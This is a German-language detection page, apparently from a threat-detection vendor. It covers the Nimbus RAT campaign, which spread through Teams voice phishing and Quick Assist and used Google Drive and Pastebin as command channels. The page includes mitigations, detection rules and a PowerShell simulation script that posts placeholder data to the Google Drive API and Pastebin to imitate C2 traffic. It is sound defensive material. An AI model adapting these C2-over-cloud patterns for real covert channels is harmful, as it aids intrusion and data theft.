Nimbus RAT wird über Microsoft Teams und Google Drive verbreitet
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure nutzten Microsoft Teams Voice Phishing zusammen mit Quick Assist, um einen Java-basierten Remote-Access-Trojaner namens Nimbus RAT bereitzustellen. Die Malware verwendet Google Drive und Google Sheets als seine Command-and-Control-Kanäle und beinhaltet eine eigene gebündelte OpenJDK-Runtime. Für den Diebstahl von Anmeldedaten verwendet sie entweder eine gefälschte Windows-Sicherheitsaufforderung oder die native CredUI-API, um Benutzergeheimnisse zu erfassen.
Untersuchung
Die Threat Response Unit von eSentire rekonstruierte die vollständige Eindringkette unter Verwendung von Mail-Flow-Protokollen, Endpunkt-Telemetrie und statischer Analyse der Java-Malware. Die Kampagne kombinierte E-Mail-Bombardierung, einen vishing-Anruf über Teams, Quick Assist Remote-Unterstützung, ein bei Pastebin gehostetes Anleitungsblatt und einen kompromittierten SharePoint-Mandanten zur Verteilung der Nutzlast.
Minderung
Empfohlene Abwehrmaßnahmen umfassen die Deaktivierung externer Teams-Nachrichten von unbekannten Mandanten, das Blockieren von Quick Assist, wo es nicht erforderlich ist, das Alarmieren bei Spitzen in der E-Mail-Bombardierung und das Überwachen javaw.exe Ausführung von ungewöhnlichen Standorten sowie das Erkennen verdächtiger Google Drive API-Aufrufe, die von unerwarteten Prozessen initiiert werden.
Antwort
Wenn Nimbus RAT-Aktivitäten erkannt werden, isolieren Sie das betroffene System, beenden Sie alle zugehörigen javaw.exe Prozesse, entfernen Sie das C:ProgramDataInboxCorePro Verzeichnis und alle zugehörigen Autostart-Verknüpfungen und ziehen Sie eine vollständige System-Neuabbildung in Betracht. Überprüfen Sie auch die Google Workspace-Auditprotokolle, um unbefugte Google Drive-Anwendungsgenehmigungen zu identifizieren.
Angriffsfluss
Erkennungen
Java-App-Ausführung von verdächtiger Stelle (über Prozess-Erstellung)
Ansehen
Verdächtige Binärdatei / Skripte im Autostart-Ort (über Datei-Ereignis)
Ansehen
Mögliches GoogleApis-Domäne durch bekannten missbrauchten Prozess aufgelöst (über DNS-Abfrage)
Ansehen
Mögliche Aktivität des Google-Befehls- und Kontroll-Dienstprogramms (über Proxy)
Ansehen
IOC (HashSha256) zur Erkennung: Nimbus RAT: Wie Bedrohungsakteure Microsoft Teams und Google Drive missbrauchen, um eine Java-RAT bereitzustellen
Ansehen
Erkennung des verdächtigen Gebrauchs von Google APIs und Pastebin [Proxy]
Ansehen
Erkennung der Nimbus RAT-Ausführung über javaw.exe und Aufklärungskommandos [Windows-Prozesserstellung]
Ansehen
Quick Assist und regedit.exe Ausführung bei Vishing-Angriff [Microsoft Windows Sicherheitsereignislog]
Ansehen
Simulation-Ausführung
Voraussetzung: Die Telemetrie- & Baseline-Vorab-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählung müssen direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die erwartete Telemetrie zu generieren, die durch die Erkennungslogik erwartet wird.
-
Angriffs-Narrativ & Befehle:
Der Bedrohungsakteur hat das Endgerät bereits mit der Nimbus RAT-Binärdatei kompromittiert. Um einen verdeckten C2-Kanal zu etablieren, sendet die RAT zwei ausgehende HTTP POST-Anfragen:- Google Drive API-Aufruf – lädt eine kleine JSON-Nutzlast hoch zu
https://www.googleapis.com/drive/v3/files?uploadType=media, ahmt das „download‑payload“-Verhalten der RAT nach. - Pastebin Paste – postet eine base‑64‑kodierte Befehlszeichenfolge an
https://pastebin.com/api/api_post.phpunter Verwendung des öffentlichen API-Schlüssels.
Beide Anfragen werden über PowerShell’s
Invoke-WebRequestausgeführt, um sicherzustellen, dass die Firewall-Protokolle dasDomainFeld enthalten (googleapis.comandpastebin.com). Der Angreifer führt die Befehle im Kontext des kompromittierten Benutzers aus, um sich mit normaler Aktivität zu vermischen. - Google Drive API-Aufruf – lädt eine kleine JSON-Nutzlast hoch zu
-
Regressionstest-Skript:
# -------------------------------------------------------------- # Nimbus RAT C2 Simulation – löst Sigma-Regel bei Domänenübereinstimmung aus # -------------------------------------------------------------- # 1. Google Drive API-Schein-Upload (keine Authentifizierung – Fokus auf Domänentelemetrie) $googlePayload = @{ name = "dummy.txt"; mimeType = "text/plain" } | ConvertTo-Json $googleUri = "https://www.googleapis.com/drive/v3/files?uploadType=media" try { Invoke-WebRequest -Uri $googleUri -Method POST -Body $googlePayload ` -ContentType "application/json" -UseBasicParsing -ErrorAction Stop Write-Host "[+] Schein-Upload an Google Drive API gesendet" } catch { Write-Warning "Google Drive-Anfrage fehlgeschlagen (in Sandbox erwartet): $_" } # 2. Pastebin öffentliche API-Post (erfordert einen Entwicklerschlüssel – mit einem Platzhalter) $pastebinKey = "YOUR_PUBLIC_API_KEY" # <-- für echten Test mit gültigem Schlüssel ersetzen $pastebinText = "echo 'Simulierter Befehl von C2'" $pastebinUri = "https://pastebin.com/api/api_post.php" $pastebinBody = @{ api_dev_key = $pastebinKey api_option = "paste" api_paste_code = $pastebinText api_paste_private = "1" } try { Invoke-WebRequest -Uri $pastebinUri -Method POST -Body $pastebinBody ` -ContentType "application/x-www-form-urlencoded" -UseBasicParsing -ErrorAction Stop Write-Host "[+] Schein-Befehl an Pastebin gepostet" } catch { Write-Warning "Pastebin-Anfrage fehlgeschlagen (in Sandbox erwartet): $_" } # -------------------------------------------------------------- # Ende der Simulation # -------------------------------------------------------------- -
Aufräumbefehle:
# Entfernen Sie alle temporären Dateien oder Variablen, die während der Simulation verwendet wurden Remove-Variable -Name googlePayload, googleUri, pastebinKey, pastebinText, pastebinUri, pastebinBody -ErrorAction SilentlyContinue Write-Host "[*] Bereinigung abgeschlossen."